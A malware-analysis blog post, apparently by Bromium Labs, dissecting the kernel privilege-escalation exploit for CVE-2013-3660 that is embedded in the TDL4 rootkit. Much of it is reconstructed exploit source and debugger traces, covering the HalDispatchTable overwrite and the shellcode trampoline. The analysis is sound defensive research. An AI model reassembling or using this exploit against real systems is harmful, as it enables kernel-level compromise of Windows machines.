As a wise man once said, there’s never a dull moment in the security industry. As the world was talking about the recent IE zero day which was doing its rounds, we encountered a variant of the infamous TDL4 rootkit (MD5 = 0e35e0e63fc208873792dd0b7afa90e7) that was rumored to be using kernel exploit code available publicly earlier this year. We would like to reiterate that earlier at Bromium Labs we had warned that kernel exploits are a huge problem for lot of security products.
We reverse engineered and extracted the exploit code from the TDL4 malware sample – to our surprise, we discovered that the public assumption is not entirely true. There are some crucial differences between the public code and the TDL4 version. Unlike its public counterpart this exploit takes advantage of the CVE-2013-3660 vulnerability in a more straightforward manner. Before diving into the article, it is recommended to read the detailed analysis of the vulnerability and familiarize you with the public exploit code.
Now let’s get through the exploitation steps used in the TDL4 sample. We restored the source code of the exploit and when applicable, named the variables after its counterparts in the public exploit.
Before actual exploitation the TDL4 exploit resolves the necessary routines and addresses such as NtQueryIntervalProfile and HalDispatchTable. In order to trigger the payload the exploit requires a chunk of data that has both a valid memory address and a pointer. TDL4 authors used the same trick as the public exploit, but changed the opcodes a little bit (further this routine is referenced as DispatchRedirect):
jmp dword ptr [ebp+0x40] inc eax jmp dword ptr [ebp+0x40] inc ecx jmp dword ptr [ebp+0x40] inc edx jmp dword ptr [ebp+0x40] inc ebx jmp dword ptr [ebp+0x40] inc esi …
This sequence of instructions can be represented as an array of 4-byte numbers: 0x404065FF, 0x414065FF, 0x424064FF etc. The exploit then makes the first doubleword a legit pointer by calling VirtualAlloc:
MEM_COMMIT | MEM_RESERVE,
This commits the memory starting at 0x40400000 making an opcode sequence 0xFF 0x65 0x40 0x40 a valid pointer. After it’s done, the exploit sets up three instances of the PATHRECORD structures. This is the main difference from the public exploit code:
ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = 1;
ExploitRecordExit->count = 0;
ExploitRecord.next = ExploitRecordExit;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable;
ExploitRecord.flags = 0x11;
ExploitRecord.count = 4;
PathRecord = VirtualAlloc(NULL, 0x30,
memset(PathRecord, 0x90, 0x30);
PathRecord->next = &ExploitRecord;
PathRecord->prev = NULL;
PathRecord->flags = 0;
At this point we have the following layout:
The PATHRECORD instances are organized in such a manner that when the vulnerability is triggered nt!HalDispatchTable+0x4 will be patched by the address of ExploitRecordExit. Let’s look at the details of the vulnerability. If we put a write breakpoint on HalDispatchTable, the program will pause in the middle of pprFlattenRec:
kd> ba w 1 nt!HalDispatchTable+0x4 kd> g Breakpoint 0 hit win32k!EPATHOBJ::pprFlattenRec+0x60
Tracing back the program workflow we can see, that pprFlattenRec creates new PATHRECORD using win32k!EPATHOBJ::newpathrec and moves it to ESI. The ExploitRecord (that we controlled) is placed at EDI:
… mov esi,dword ptr [ebp-4] ; ESI = NewPathRec … mov edi,dword ptr [ebp+8] ; EDI = ExploitRecord mov eax,dword ptr [edi+4] ; EAX = ExploitRecord.prev mov dword ptr [esi+4],eax ; NewPathRec.prev = ExploitRecord.prev …
After some manipulation with count and flags members the following code is executed:
… mov eax, dword ptr [esi+4] ;; EAX = HalDispatchTable+4 mov dword ptr [eax],esi ;; Patch HalDispatchTable+4! …
At this point we have HalDispatchTable+4 containing address of NewPathRec. The next pointer is initialized to zero here and later in the function it receives the next pointer of ExploitRecord, i.e. ExploitRecordExit:
… mov edi, dword ptr[edi] ; EDI points at ExploitRecordExit.next mov dword ptr[esi], edi ; NewPathRec.next = 0x404065FF …
So HalDispatchTable+4 points at the valid sequence of opcodes. This conditions allows us to trigger the shellcode by calling NtQueryIntervalProfile, which at some point calls nt!HalDispatchTable+4 .
Now let’s look at how the vulnerability condition is triggered. Similar to the public exploit, the TDL variant generates a huge number of Point objects:
for(PointNum = 0; PointNum < 0x7C80; PointNum++)
Points[PointNum].x = (ULONG)(PathRecord)>>4;
Points[PointNum].y = (ULONG)(PathRecord)>>4;
PointTypes[PointNum] = 4;
Next, it enters the 5-step loop, where the actual exploitation occurs. First, it draws the curves using the Points array and creates a compatible device context:
if(hdc == NULL)
PolyDraw(Device, Points, PointTypes, 0x1F2);
PolyDraw(Device, Points, PointTypes, 0x1E3);
hdc = CreateCompatibleDC(Device);
Now the curves are drawn, it calls the vulnerable function FlattenPath. But before that it creates some memory pressure (calling CauseFailure()) and then cleans up the created objects.
if( !PolyDraw(hdc, Points, PointTypes, PointNum*0x1F2) )
lpAddress = VirtualAlloc(NULL, 5,
MEM_COMMIT | MEM_RESERVE,
*lpAddress = 0xE9;
*(DWORD *)(lpAddress+1) = (DWORD)(ShellCode) – (DWORD)(lpAddress) – 5;
VirtualFree(lpAddress, 0, 0x8000);
hdc = NULL;
The lpAddress variable is a buffer which is used as a trampoline to jump to the shellcode. It writes 0xE9 followed by [ShellCodeAddress – lpAddress – 5], which is “jmp ShellCode” instruction. The shellcode execution is triggered using NtQueryIntervalProfile. At this moment the nt!HalDispatchTable+0x4 points at 0x404065FF, which, translated to processor instructions, gives us jmp [ebp+0x40], inc eax. The jump leads to the shellcode trampoline, which, on its turn launches the actual shellcode.
The CauseFailure function repetitively calls CreateCompatibleBitmap for the in-memory device context. RegionSize is a global variable initialized to 0.
NumRegion = 0;
hdc = CreateCompatibleDC(NULL);
for(Size=0x400000; Size; Size>>=2)
while(Regions[NumRegion] = CreateCompatibleBitmap(hdc, Size, Size))
Regions = realloc(Regions, RegionSize*4);
Then Cleanup simply removes all the objects created:
Altogether it provides a remarkably stable way to run the payload from kernel space. We observed almost 100% stability on Windows 7+ of this exploit, however sometimes crashes are possible, especially in the case of repetitive uses. The TDL4 sample makes 2 attempts to exploit the system, but in most cases one is enough.
In short, this version of CVE-2013-3660 exploit embedded in TDL is far more lethal than the public exploit code and further exploitation of this issue is likely.